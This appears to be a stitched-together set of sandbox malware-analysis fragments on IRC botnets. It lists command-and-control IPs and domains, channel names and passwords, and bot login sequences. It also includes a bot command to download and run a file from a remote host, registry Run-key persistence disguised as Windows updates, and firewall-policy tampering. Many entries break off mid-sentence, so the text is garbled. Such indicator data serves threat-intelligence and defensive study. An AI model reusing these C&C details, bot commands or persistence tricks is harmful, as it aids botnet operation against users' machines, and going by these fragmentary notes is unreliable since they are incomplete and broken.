Remote Host  Port Number
184.73.209.168  80
204.0.5.41  80
204.0.5.48  80
204.0.5.49  80
204.0.5.51  80
204.0.5.57  80
204.0.5.58  80
204.0.5.59  80
216.178.38.103  80
216.178.38.168  80
205.234.236.19  1234

PASS xxx
NICK NEW-[USA|00|P|36443]
USER XP-9032 * 0 :COMPUTERNAME
MODE NEW-[USA|00|P|36443] -ix
JOIN #!nn! test
PONG 22 MOTD

* The data identified by the following URLs was then requested
SmartEye malware
Remote Host  Port Number
184.154.74.130  20
184.154.74.130  21
64.208.241.65  80

* The data identified by the following URLs was then requested from the remote web server:
  o http://update.adobe.com/pub/adobe/acrobat/js/6.x/rdr/win/enu/DataScript.js
  o http://update.adobe.com/pub/adobe/acrobat/js/6.x/rdr/win/enu/CodeScript.js
  o http://update.adobe.com/pub/adobe/acrobat/js/6.x/rdr/win/enu/UIScript.js
  o http://update.adobe.com/pub/adobe/acrobat/js/6.x/rdr/win/enu/ResourceScript.js
  o http://update.adobe.com/pub/adobe/acrobat/js/6.x/rdr/win/enu/MasterScript.js

USER uploader@demo.ymlook.com passwd !234567*

Registry Modifications
* The following Registry Keys were created:
  o HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall
  o HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile
  o HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile
webpro569.redirectme.net
DNS Lookup
Host Name  IP Address
webpro569.redirectme.net  46.4.245.19

C&C Server: 46.4.245.19:6667
Server Password:
Username: 0127
Nickname: {N}|DEU|XP|DELL-D3E62F7E26|970986
Channel: #webpro (Password: SRR569)
Channeltopic: :oppp pecie of candy

Registry Changes by all processes
Create or Open
Changes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run “Windows Update Sched” = c:\BotCrypted.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run “Windows Update Sched” = c:\BotCrypted.exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List “Windows Update Sched” = c:\BotCrypted.exe
Reads
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework
174.139.92.250(Link Bot)
Remote Host  Port Number
174.139.92.250  4466,6764

USER waahud waahud waahud :cuipesjdhissjgkx
NICK d[jLyAxEK]b
MODE d[jLyAxEK]b +xi
JOIN #balengor
USERHOST d[jLyAxEK]b
MODE #balengor +smntu
PONG :binidic.net

Now talking in #balengor
Topic On: [ #balengor ] [ * exe 91.203.146.65 9933 ][ * ipscan s.s.s netapi -s ]
Topic By: [ aessg ]

Other details
* The
niktonidumal.biz
niktonidumal.biz  91.215.157.104

C&C Server: 91.215.157.104:81
Server Password:
Username: 4390
Nickname: sdbahqa|INF|18|45|4|187|
Channel: #iusb# (Password: )
Channel: #biz#
Channeltopic: :, !/98/115/36/73/121/96/119/48/55/34/122/125/119/50/113/98/117/109/126/122/102/124/37/71/89/121/109/120/110/100/55/105/111/110/46/79/47/102/113/71/ .s /99/106/112/81/55/59/40/125/111/122/35/108/97/127/114/97/121/103/119/59/104/109/106/84/65/124/108/52/105/120/116/37/112/113/110/70/104/111/39/82/114/112/60/111/104/40/50/59/39/63/37/32/18/17/45/113/121/67/118/110/41/80/70/71/40/57/39/18/44/55/22/50/54/56/58/46/86/119/71/ .j ,

Registry Changes by all processes
Create or Open
Changes
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run “MicrosoftUpdateServices” = Dokumente und Einstellungen\Administrator\winusbsmgr.exe
Reads
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService “DefaultAuthLevel”
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PCHealth\ErrorReporting “DoReport”
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PCHealth\ErrorReporting “ShowUI”
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PCHealth\ErrorReporting “AllOrNone”
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PCHealth\ErrorReporting “IncludeMicrosoftApps”
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PCHealth\ErrorReporting “IncludeWindowsApps”
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PCHealth\ErrorReporting “DoTextLog”
124.217.229.162(Parabola botnet)
178.18.113.122
Remote Host  Port Number
178.18.113.122  6667

Other details
* The following port was open in the system:
  Port  Protocol  Process
  1051  TCP  [file and pathname of the sample #1]

Registry Modifications
* The following Registry Keys were created:
  o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{AAECD99A-AAA4-CD63-DDDF-5CF8BAD8D2F2}
  o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer
  o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\run
  o HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components\{AAECD99A-AAA4-CD63-DDDF-5CF8BAD8D2F2}
* The newly created Registry
testusa.helohmar.com
Remote Host  Port Number
testusa.helohmar.com  8800

Resolved : [testusa.helohmar.com] To [76.73.36.42]

Registry Modifications
* The newly created Registry Values are:
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
    + Taskman = “C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-1455\fddg.exe”
    so that fddg.exe runs every time Windows starts
  o [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
    + Tji771 = “C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-1455\fddg.exe”
    so that fddg.exe runs every time Windows starts
  o [HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
    + Shell =
178.63.148.49
Remote Host  Port Number
178.63.148.49  6667

NICK n{USA|XP}693101
USER 4584 “” “TsGh” :4584
JOIN #Adam

Registry Modifications
* The newly created Registry Values are:
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    + Windows Update System = “%AppData%\winlogon.exe”
    + UserFaultCheck = “%System%\dumprep 0 -u”
    so that winlogon.exe runs every time Windows starts
  o [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
    + Windows Update System = “%AppData%\winlogon.exe”
    so
66.187.110.152
Remote Host  Port Number
66.187.110.152  81

NICK n[USA|XP]1167074
USER s “” “lol” :s
JOIN #newbin#
PONG 422
JOIN #USA (null)

* The following port was open in the system:
  Port  Protocol  Process
  1053  TCP  msnd.exe (%AppData%\msnd.exe)

Memory Modifications
* There was a new process created in the system:
  Process Name  Process Filename  Main Module Size